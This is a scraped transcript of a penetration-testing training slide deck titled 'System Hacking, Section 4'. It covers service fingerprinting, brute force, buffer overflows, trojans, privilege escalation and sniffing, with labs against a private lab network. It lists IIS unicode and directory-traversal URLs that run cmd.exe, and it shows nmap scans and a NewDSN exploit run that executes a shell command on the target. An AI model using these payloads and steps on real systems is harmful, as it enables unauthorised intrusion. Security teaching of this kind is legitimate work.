Download Document

Survey
yes no Was this document useful for you?
   Thank you for your participation!

* Your assessment is very important for improving the workof artificial intelligence, which forms the content of this project

page
1
page
2
page
3
page
4
page
5
page
6
page
7
page
8
page
9
page
10
page
11
page
12
page
13
page
14
page
15
page
16
page
17
page
18
page
19
page
20
page
21
page
22
page
23
page
24
page
25
page
26
page
27
page
28
page
29
page
30
page
31
page
32
page
33
page
34
page
35
page
36
page
37
page
38
page
39
page
40
page
41
page
42
page
43
page
44
page
45
page
46
page
47
page
48
page
49
page
50
page
51
page
52
page
53
page
54
page
55
page
56
page
57
page
58
page
59
page
60
page
61
page
62
page
63
page
64
page
65
page
66
page
67
page
68
page
69
page
70
page
71
page
72
page
73
page
74
page
75
page
76
page
77
page
78
page
79
page
80
page
81
page
82
page
83
page
84
page
85
page
86
page
87
page
88
page
89
page
90
page
91
page
92
page
93
page
94
page
95
page
96
page
97
page
98
page
99
page
100
page
101
Document related concepts

Lag wikipedia , lookup

Parallel port wikipedia , lookup

Computer security wikipedia , lookup

Zero-configuration networking wikipedia , lookup

Buffer overflow protection wikipedia , lookup

Remote Desktop Services wikipedia , lookup

Buffer overflow wikipedia , lookup

Cross-site scripting wikipedia , lookup

Distributed firewall wikipedia , lookup

Cracking of wireless networks wikipedia , lookup

Transcript 
System Hacking
Section 4
5/25/2017
Outline
•
•
•
•
•
•
Service identification
Vulnerability identification and research
Exploits
Putting it all together
Target selection in large networks
Using automated tools
5/25/2017
Service Identification
Section 4.1
5/25/2017
Service Identification
• Common ports
• Banners
• Fingerprinting
5/25/2017
Connecting to ports
• Telnet or netcat is the best way to connect
to ports
• Many services may be accessed directly
5/25/2017
Common ports
Many services can be identified by their common port numbers
5/25/2017
Zone-h.org
5/25/2017
Alldas.de
5/25/2017
Banners
Some services may be better identified by
banners:
• telnet on routers (2001, 4001, 6001)
• Web daemons for applications
– Compaq Insight Manager
– Many systems include web configuration
interfaces
5/25/2017
Banners
5/25/2017
Fingerprinting
Some services cannot be clearly identified
just by connecting the them:
• Netbus on NT uses the same port as an
RPC service on Solaris
• Some database connections do not provide
automatic response
Fingerprinting a service may identify what it
is, even if it has moved ports
5/25/2017
Fingerprinting
5/25/2017
Vulnerability Research
Section 4.2
5/25/2017
Vulnerability identification and
research
• This is the process of mapping identified security
attributes of a system or application to potential
vulnerabilities
Several methods to map vulnerabilities:
1. Manually map identified systems against publicly
available database such as www.securityfocus.com,
www.cert.org and vendor security alerts
2. Use public exploit code posted to various security
mailing lists, hacker websites or write your own code
3. Use automated vulnerability scanning tools such as
Nessus, ISS or whisker
5/25/2017
Vulnerability research
5/25/2017
Lab
• Explore the following security sites to identify
what vulnerability information would be of use to
you for the services you have identified.
–
–
–
–
–
www.securityfocus.com
General searches on google.com
www.packetstormsecurity.com
www.astalavista.box.sk
www.securiteam.com
Time: 30 minutes
5/25/2017
Exploits
Section 4.3
5/25/2017
Types of exploits
• Remote exploits
• Trojans
• Privilege escalation
5/25/2017
Remote Exploits
Section 4.3.1
5/25/2017
Remote exploits
A ‘remote exploit’ attempts to gain access
across the network and without proper
authentication.
Examples:
• Brute force authentication attempts
• Attacks bypassing integrity checkers
• Buffer overflows
• Sniffing (to some extent)
5/25/2017
Brute force attacks
Most common services attacked
1. Telnet
2. FTP
3. “R” commands
4. Secure Shell
5. SNMP community names
6. Post Office Protocol (POP)
7. HyperText Transport Protocol (HTTP/HTTPS)
8. SMB
5/25/2017
Common Tools used
•
•
•
•
•
•
Brutus
Admsnmp
Admsmb
TeeNet
Pwscan.pl
Thc_hydra
5/25/2017
Remote password guessing
• Attempting to connect to an enumerated
share such as (ADMIN$ and C$) and
trying username/password combinations
until one works
• A “null session” can be established with
the target to obtain valid account names
• Use an automated password guessing tool
to brute force the selected shares.
5/25/2017
Brute force attacks under
Windows
• Some common services prone to bruteforce:
– Web
– Netbios
– FTP
5/25/2017
5/25/2017
Legion
5/25/2017
Brute force attacks under Unix
• Some common services prone to bruteforce:
–
–
–
–
–
telnet
Ssh
Web
FTP
R-commands
5/25/2017
Lab
• Use a Netbios scanning tool to identify
local shares on this network
• Use brute force tool to attempt access to an
account on 10.0.1.120
• Warning! These tools can produce
significant traffic and lock accounts.
Time: 30 minutes
5/25/2017
Buffer overflow attacks
FULL WORKSHOP ON BUFFER
OVERFLOWS AVAILABLE from
LOUD-FAT-BLOKE
•
•
•
•
Stack overflows
Format string overflows
Heap overflows
Overflow subverting the control path
5/25/2017
Buffer overflow attacks
FULL WORKSHOP
ON BUFFER
OVERFLOWS
AVAILABLE from
LOUD-FAT-BLOKE
5/25/2017
Buffer overflow attacks
FULL WORKSHOP ON BUFFER OVERFLOWS
AVAILABLE from
LOUD-FAT-BLOKE
• Occurs when a user or process attempts to place
more data into a buffer than was originally
allocated
• Commonly associated with C functions like
strcpy(), strcat(), sprintf() and etc
• Most frequently found when user input is taken
and passed into an application
5/25/2017
Windows buffer overflows
• Only a few conditions have been revealed to date
• All of them exploited flaws in application programs
• Very common for DoS attacks
Exploits
1. Netmeeting 2.x by Cult of the Dead Cow
2. NT RAS by Cerberus Information Security
3. Winhlp32 by Cerberus Information Security
4. IISHack by eEye
5. Oracle Web Listener 4.0 by CIS
6. Outlook GMT token overrun by Underground Security
Systems Research
7. IIS .printer
5/25/2017
Unix buffer overflows
•
•
•
•
Sadmind
ftp
Ssh
nfs
5/25/2017
Unexpected input
• Bypassing integrity checks
• Gaining access by providing unexpected
input
– IIS unicode
– Web applications
5/25/2017
Format string attacks
• Caused by programming errors in the
formatted output family of functions,
which includes printf() and sprintf()
• Efforts usually focused on SUID root
programs
5/25/2017
Input validation attacks
• Occurs when a program fails to recognise
syntactically incorrect input
• Occurs when a module accepts extraneous
input
• Occurs when a module fails to handle
missing input fields
• A field-value correlation error occurs
• Common in web applications
5/25/2017
IIS vulnerabilities
• Unicode and URL based attacks
• Special tags in HTTP
• Sample scripts to brute force
5/25/2017
IIS hacking
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
/scripts/root.exe?/c+dir
/MSADC/root.exe?/c+dir
/c/winnt/system32/cmd.exe?/c+dir
/d/winnt/system32/cmd.exe?/c+dir
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system
32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
5/25/2017
Lab
• Use the provided URLs to roam the
filesystem of 10.0.1.120
• What is accessible and what is not?
Time: 10 minutes
5/25/2017
Trojan Horses and Backdoors
Section 4.3.2
5/25/2017
Windows trojans and backdoors
These programs provide unauthorised access
to a system without the user’s knowledge:
• Theef
• CDC BackOrifice
• SubSeven
• Moosucker
A great site: http://www.tlsecurity.net
5/25/2017
Tlsecurity.net
5/25/2017
Privilege Escalation
Section 4.3.3
5/25/2017
Privilege escalation
• Attack used to move from normal user to
superuser
• Quest for Administrator
• Quest for root
5/25/2017
Quest for Administrator
•
•
•
•
Hoovering information
Getadmin
Sechole
Spoofing LPC Port requests
5/25/2017
Hoovering information
• Identify further information that will gain
higher privileges
• Srvinfo
• Find utility
• regdmp
5/25/2017
Getadmin
• Windows NT 4
• Small program written by Konstantin
Sobolev
• Adds users to the local admin group
• Hijacks a process called winlogon
• Patched by NT SP3
5/25/2017
Sechole
• Similar functionality to getadmin
• Modifies instructions in the memory of the
OpenProcess API
• Possible to launch remotely if IIS is
running
• Patched by NT SP6a
5/25/2017
Spoofing LPC Port Requests
• Vulnerability identified by The RAZOR
Team at http://razor.bindview.com
• The code takes advantage of a flaw in one
function of the Local Procedure Call (LPC)
Ports API
5/25/2017
Quest for root
•
•
•
•
•
•
•
•
•
Local buffer overflow
Symlink
File Descriptor attacks
Signal handling
Core-file manipulation
Shared libraries
Kernel flaws
System misconfiguration
IFS attacks
5/25/2017
Local buffer overflow
• Mostly used to exploit SUID root programs
• May add username to password file
5/25/2017
Sniffing
Section 4.3.4
5/25/2017
Sniffing
• Sniffing works by setting a network card to
‘promiscuous mode’
• Sniffing only works on traffic travelling
across the local network
• Sniffing is greatly complicated by network
switchs
5/25/2017
Windows password sniffing
• Can use any ordinary packet analyser
• Or use a specialised tool such as l0phtcrack
• Some susceptible services:
– Netbios
– FTP
– Web (especially cookies)
5/25/2017
Windows password sniffing
5/25/2017
Unix password sniffing
• Can use any ordinary packet analyser
• But Unix has some great sniffers such as dsniff
• Many Unix programs send passwords in clear
text
• Some susceptible services:
– Telnet
– FTP
– Web
5/25/2017
dsniff
•
•
•
•
•
•
•
Netbios
ftp
telnet
R-commands
http
Instant messenging
And much much
more!
5/25/2017
NT services
Section 4.4
5/25/2017
Common NT services
5/25/2017
Profile: Netbios
•
•
•
•
•
Ports 135:139
Susceptible to sniffing, brute force
Scanners available to search for shares
Can give access to system registry
Normally blocked at routers due to
broadcast
5/25/2017
Profile: Web
• Port: 80, or any for special apps
• Common servers: Apache, Oracle, IIS,
Cold Fusion
• Very susceptible to DoS attacks
• Often give read access to all files
• IIS vulnerabilities are legendary
5/25/2017
Profile: SMTP
• Port: 25
• Very susceptible to mail relay
• Not a lot else
5/25/2017
Profile: FTP
• Port:21
• Part of IIS distribution
• Some vulnerabilities but not a large target
5/25/2017
Profile: databases
• Ports: 1433, 1510, 1725
• MSSql is a good internal network target
• MS and Oracle often set with default
passwords
• “SQL injection” a favourite for web
hackers
5/25/2017
Unix services
Section 4.5
5/25/2017
Profile: SNMP
• Port: 160, 161 UDP
• SNMP has two default passwords: public,
private
• Tools such as snmpwalk good for
enumerating entries
5/25/2017
Profile: TFTP
• Port: 69
• Typically used to boot diskless
workstations or network devices such as
routers
• No username or password
• Good for sending around files from hacked
systems
5/25/2017
Profile: FTP
• Ports: 20, 21
• Allows upload and download of files from
a remote system
• Many ftp server allow anonymous access
• May be vulnerable to buffer overflow
• Can also be used for bounce attacks
5/25/2017
Profile: Sendmail
• Port: 25
• Mail transfer agent used on many Unix
systems
• Can be used to identify accounts via the
vrfy and expn commands
• Some version susceptible to denial of
service and buffer overflows
• Long list of vulnerabilities
5/25/2017
Profile: RPC
• Remote Procedure Call
• Allow a program on one computer to
execute code on a remote system
5/25/2017
Profile: Web
•
•
•
•
Port: 80
Apache is most common
Not as many attacks as IIS
Always check URLs for embedded
commands
5/25/2017
Identifying targets in large
networks
Section 4.6
5/25/2017
Target selection
• Scan for specific services
–
–
–
–
Database (MS, Oracle, Sybase)
Web
RPC
R-commands
• View Netbios browse lists to make way to
PDC/server
• View Netbios browse lists to identify treasury, etc
5/25/2017
Automated vulnerability
scanning tools
Section 4.8
5/25/2017
Example automated applications
•
•
•
•
•
•
Grinder
SiteScan
Whisker
Twwscan
Nessus
Elza – scriptable web client
5/25/2017
whisker
5/25/2017
Nessus
5/25/2017
Conclusion
• Hackers often search for specific known
vulnerabilities and avoid well-secured
systems
• Free tools make it simple to gain
unauthorised access to some systems
• Tools such as Nessus should be used by
every security professional
5/25/2017
Putting it all together
Section 4.7
5/25/2017
Our Configuration for today
For the purpose of the presentation, we
will not perform our tests over the internet
But we won’t cheat by cutting out the
firewall
Webserver
Internal=10.0.1.120
TCP 80 only
External=10.0.0.120
Internet
10.0.0.1
Router
Firewall
10.0.0.125 10.0.1.125
5/25/2017
Network Penetration Tests
5/25/2017
Identifying firewall
Strategy
• Identify the Web or Mail server
• Get the Next-Hop before this
–
–
–
–
This will probably be the perimeter router or the firewall
Firewall 1 & NetScreen appear as a hop
PIX does not appear as a hop (flattens the network)
80% chance that it will be NetScreen, PIX or Firewall 1
• To figure out which
–
–
–
–
ICMP ( i.e. Address Mask Request – Response headers)
Use TCP Stack finger printing
Key ports (258, 259 + 263 could be firewall 1)
IPSEC
BUT luckily
these days the tools are pre-written
5/25/2017
Identifying the Firewall Traceroute
[root@wireless root]# traceroute 10.0.0.120
traceroute to 10.0.0.120 (10.0.0.120)
30 hops max, 38 byte packetsUDP being blocked
Need another tool
1
* * *
2
* *
5/25/2017
Identifying the Firewall - LFT
# lft -vv –E -n 10.0.0.120
Looks like we made it.
Everyone responded.
Will finish TWO
TTL
Moving on...
Suggests
Concluding with 2 hops.
something
between
us
LFT trace to 10.0.0.120:80/tcp
**[4.2 BSD bug]next gateway may errantly reply with reused TTLs
A firewall
perhaps
**[4.2 BSD bug]next gateway may errantly reply with reused TTLs
1 [target] 10.0.0.120:80 6.5ms
2 [target] 10.0.0.120:80 1.6ms
Could also use MPTraceroute
5/25/2017
Accessible hosts – sweep for the
firewall
# nmap -sP -n 10.0.0.*
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Host
Ourup.
web server
(10.0.0.120) appears to be
Host
(10.0.0.121) appears to be down.
Host
Who’s this
(10.0.0.122) appears to be down.
Host
(10.0.0.123) appears to be down.
Host
(10.0.0.124) appears to be down.
Host
(10.0.0.125) appears to be up.
Host
(10.0.0.255) appears to be down.
Nmap run completed -- 256 IP addresses (2 hosts
up) scanned in 35 seconds
5/25/2017
Identifying the perimeter – Ikescan
# ike-scan -v 10.0.0.125
Starting ike-scan 1.6 with 1 hosts
---
Pass 1 of 3 completed
---
Pass 2 of 3 completed
---
Pass 3 of 3 completed
Ending ike-scan 1.6:
1 hosts scanned in 22.595 seconds (0.04 hosts/sec).
0 returned handshake; 0 returned notify
5/25/2017
Identifying the Firewall conclusion
# ping 10.0.0.120
PING 10.0.0.120
: 56(84) bytes of data.
64 bytes from 10.0.0.120: icmp_seq=1 ttl=128
time=0.280 ms
--- 10.0.0.120 ping statistics --2 packets transmitted, 2 received, 0% loss
Windows !!
# ping -v -R 10.0.0.120
PING 10.0.0.120 : 56(124) bytes of data.
--- 10.0.0.120 ping statistics ---
With low level
Packet
inspection
6 packets transmitted, 0 received,100%
loss
I think not!!
5/25/2017
Identifying the Firewall – Icmp
processing
# ping -v -T tsandaddr 10.0.0.120
PING 10.0.0.120 (10.0.0.120) from 10.0.0.1 : 56(124)
bytes of data.
--- 10.0.0.120 ping statistics --16 packets transmitted, 0 received, 100% loss
# ping -v -T tsandaddr 10.0.0.125
PING 10.0.0.125 (10.0.0.125) from 10.0.0.1 : 56(124)
bytes of data.
--- 10.0.0.125 ping statistics --8 packets transmitted, 0 received, 100% loss
5/25/2017
Identifying the Firewall Conclusion
• We suspect there is a firewall
– We know the web server is windows
– But windows is not normally capable of
manipulating packets to this extent
– We are fairly sure that it isn’t firewall 1
Lets see if we can hack into the servers
5/25/2017
Hacking the other address 10.0.0.125
5/25/2017
Scanning 10.0.0.125
# nmap -sS -n -p 1-10000
10.0.0.125
Starting nmap 3.48 ( http://www.insecure.org/nmap/ )
All 10000 scanned ports on 10.0.0.125 are: filtered
Nmap run completed -- 1 IP address (1 host up)
Nothing to hack
# nmap -sU -n -p 1-10000
10.0.0.125
Starting nmap 3.48 ( http://www.insecure.org/nmap/ )
All 10000 scanned ports on 10.0.0.125 are: filtered
Nmap run completed -- 1 IP address (1 host up)
5/25/2017
Hacking the web server
5/25/2017
Hacking the web server
– Scan TCP ports
– Scan UDP ports
!!! Only HTTP or HTTPS ports should be visible
– Run CGI scanner (I.e. Whisker, Crazymad or Nikto) to
look for web server exploits
– Check Scanner
– Identify exploits
5/25/2017
Hacking the web server
Scan UDP ports
#
# nmap -sU -n -p 1-10000
10.0.0.120
Nothing to hack
Starting nmap 3.48
All 10000 scanned ports on 10.0.0.120 are:
filtered
Nmap run completed -- 1 IP address (1 host
up) scanned in 623.296 seconds
#
#
#
5/25/2017
Hacking the web server
Scan TCP ports
#
nmap -sS -n -O -p 1-1024 10.0.0.120
HTTP - The only
Interesting ports on 10.0.0.120:
Port to hack
(The 1023 ports scanned but are
filtered)
PORT
STATE SERVICE
80/tcp open http
Now we know
Running (JUST GUESSING) : Cisco pix os 6.X
(88%)
Aggressive OS guesses: Cisco PIX 501 running
6.x
No exact OS
matches for host.
5/25/2017
Hacking the web server
Run CGI scanner
# ./whisker.pl -h 10.0.0.120
-- whisker / v1.4.0 / rain forest puppy –
= Host: 10.0.0.120
= Server: Microsoft-IIS/4.0
+ 200 OK (IDC error): GET
/scripts/samples/details.idc
+ 200 OK (IDC error): GET
/scripts/samples/ctguestb.idc
+ 200 OK: HEAD /scripts/tools/newdsn.exe
- this can be used to make DSNs, useful in
use with our ODBC exploit
- and the RDS exploit (with msadcs.dll)
[root@wireless
v1.4]# exit
5/25/2017
Hacking the web server
Analysing CGI scanner results
5/25/2017
Hacking the web server
Analysing CGI scanner results
5/25/2017
Hacking the web server
Analysing CGI scanner results
5/25/2017
Run exploit identified by scanner
# dsnhackII.pl
-c
-h 10.0.0.120
NewDSN exploit v 1.3 -- Scrippie / Phreak.nl
* [Checking for necessary files] *
Checking for: newdsn.exe
-- Found :)
Checking for: ctguestb.idc
-- Found :)
Checking for: details.idc
-- Found :)
* Now trying to create "Web SQL" DSN... <success> *
Initializing GuestBook by GETting ctguestb.idc
Type the command line you want to run (cmd /c assumed):
cmd /c dir >> ..\hamster
* Now trying to execute command... <success> *
[root@wireless root]#
5/25/2017
Lab
• Attack the systems provided and attempt to
get command line access to NT
Time: 45 minutes
5/25/2017
Related documents
Security monitoring through log analysis
Security monitoring through log analysis
Instructor Rubric for Presentations
Instructor Rubric for Presentations
WWW Lab1
WWW Lab1
Sustainable Consumption & Production
Sustainable Consumption & Production
Document
Document
Tapeworm Diseases - AAP Red Book
Tapeworm Diseases - AAP Red Book
Document
Document
Back to School 2006
Back to School 2006
Math 130
Math 130
Slide 1
Slide 1
Marketing Essentials: Intro to Marketing
Marketing Essentials: Intro to Marketing
India`s Infrastructure
India`s Infrastructure
Alan Chu Patrick Pahmeyer
Alan Chu Patrick Pahmeyer
Document
Document